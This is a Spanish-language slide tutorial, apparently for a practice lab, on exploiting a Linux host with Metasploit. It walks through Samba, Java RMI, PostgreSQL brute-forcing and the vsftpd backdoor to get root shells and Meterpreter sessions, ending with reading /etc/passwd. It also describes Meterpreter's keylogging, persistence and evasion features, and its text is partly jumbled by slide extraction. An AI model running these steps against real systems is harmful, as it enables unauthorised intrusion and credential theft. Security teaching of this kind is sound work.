EXPLOTACIÓN DE
VULNERABILIDADES
Metasploit framework contra linux
Metasploit framework, es una
herramienta para desarrollar y Metasploit frame work?
ejecutar exploits contra una
máquina o target remoto. Ayuda a
los equipos de seguridad a hacer
más que solo verificar
vulnerabilidades, Esta herramienta
es ideal para la etapa de
explotación de vulnerabilidades.
Permite a los especialistas en
seguridad mantenerse siempre un
paso por delante de los hackers.
3
os importantes
Terminos importantesaaconsiderar
considerar:
Modulos de Metasploit Framework
5
Características principales de
metasploit framework
Es una herramienta muy completa que tiene
muchisimos exploits, que son vulnerabilidades
conocidas, en las cuales tienen Tambien unos
modulos, llamados payloads, que son los codigos
que explotan estas vulnerabilidades.
Tambien dispone de otros tipo de modulos, por
ejemplo, los encoders, que son una especie de
codigos de cifrado para evasion de antivirus o
Sistema de seguridad perimetral
Ademas ofrece la posibilidad de exporter el
malware a cualquier formato, ya sea en sistemas
Unix o Windows es multiplataforma y gratuita. Para abriri
abrir usar
metasploit usar instrucción:
la sig
Para la siguiente
msfconsole
6
Metasploit - Explotación en S.O. Linux
Iniciar
METASPLOIT sudo su
service postgresql status
service postgresql start
msfdb status
msfdb init
msfconsole
8
PUERTO 445
SAMBA
Samba es el equivalente al
SMB de Windows en los
sistemas Unix.
Permite compartir archivos e
impresoras en una red local.
msfconsole
Se puede buscar con search smb_version o search CVE para identificar xploits para hackear algo en específico.
Usar el auxiliar: smb_version para identificar la versión del SMB. show option requisitos de ejecucion
Para este puerto dispone de varios escáneres en Metasploit mediante los que obtener información del servicio.
use auxiliary/scanner/smb/smb_version = seleccionar el auxiliar que identifica la versión
set RHOSTS 192.168.0.197 = apuntar al objetivo
run = ejecutar el auxiliar
Establecer la IP de la máquina objetivo en RHOSTS y ejecutar el escáner con el comando run. En este
caso se trata de Samba 3.0.20-Debian. 10
back ayuda para ir al principio (raiz) de metasploit y probar otros exploits info ver información del payload, exploit y otros.
Ejemplo 2: Usar un exploit mediante el cual obtendra una shell con privilegios root.
Configuramos el exploit de la siguiente forma: search usermap_script
Una vez configurado lanzar el exploit y se obtiene el acceso al sistema como root
Si se queda en negro es por que ya esta dentro probar diferentes comandos ejm:
ifconfig
JAVA-RMI Se trata de un mecanismo de Java
para invocar un método de forma
remota.
Proporciona una forma simple de
comunicación entre servidores en
aplicaciones basadas exclusivamente
en Java (para la comunicación entre
otras tecnologías debe utilizarse
CORBA o SOAP).
Que es meterpreter?
Meterpreter es un payload muy
potente es uno de los proyectos
estrella de Metasploit Framework.
Permite obtener una gran cantidad de
información sobre un objetivo
comprometido, así como también
manipular ciertas características del
sistema objetivo.
Cuenta con un intérprete que permite
interactuar con el objetivo por medio
de una serie de instrucciones directas
que son fáciles de recordar y sirven
para llevar a cabo procesos de
explotación y post-explotación.
14
Que es meterpreter?
1. Acceso remoto completo: Meterpreter permite un control remoto total sobre un Sistema
comprometido, lo que permite ejecutar comandos, manipular archivos, acceder a la
webcam y el micrófono, y obtener información del sistema.
2. Persistencia: Meterpreter puede establecer una conexión persistente con el sistema
objetivo, lo que significa que puede mantener el acceso incluso después de reinicios o
desconexiones.
3. Túneles y pivoteo: Meterpreter permite crear túneles y realizar pivoteo en redes
comprometidas, lo que facilita la exploración y el ataque a otros sistemas dentro de la red.
4. Funciones avanzadas de post-explotación: Meterpreter ofrece una amplia gama de
funcionalidades posteriores a la explotación, como la extracción de contraseñas
almacenadas, la captura de pantallas, el registro de pulsaciones de teclas, el robo de
cookies y la inyección de DLL.
5. Ofuscación y evasión de detección: Meterpreter tiene la capacidad de ofuscar su
tráfico y modificar su firma para evadir la detección de sistemas de seguridad y
Antivirus.
15
Para la explotación de este puerto disponemos de un exploit en Metasploit,
también se requiere cargar un payload para su ejecución search java_rmi_server
Ejecutar exploit para obtener acceso al sistema a traves de meterpreter
METERPRETER
Listar los directorios a traves del comando dir
Ver los procesos ejecutándose a través del comando ps
PUERTO 5432 PostgreSQL, también llamado
Postgres, es un sistema de
PostgresSQL gestión de bases de datos
relacional orientado a objetos y
de código abierto, publicado
bajo la licencia PostgreSQL
Fuerza bruta para encontrar el password
Seleccionar el auxiliar postgres_login
Fuerza bruta para encontrar el password
Añadimos los valores RHOSTS, PASS_FILE, USERNAME
Password encontrado!!
Con el password obtenido ahora se tratará de explotar el puerto de postgres con el
payload postgres_payload
Llenar los siguientes valores:
Ejecutar el exploit en segundo plano exploit -j
Listar sesiones sessions -i y seleccionar la sesion con sessions -i 1
Listo ya se tiene control del target a traves de postgres..
FTP (VSFTPD)
Vsftpd es uno de los servidores FTP más potentes y completos
disponibles para la mayoría de distribuciones de Linux.
Este servidor FTP es el favorito de muchos administradores de
sistemas por la configurabilidad que es capaz de proporcionarnos,
y por la facilidad de configuraciones avanzadas en el propio
servidor FTP.
Usar el exploit vsftpd_234_backdoor y con info pueden ver más detalles del exploit
Apuntó el target con RHOST y ejecuto el exploit luego ya obtenemos acceso al SO!!!
Y de ahi ya podrá obtener la información que quiera cat /etc/passwd y otros...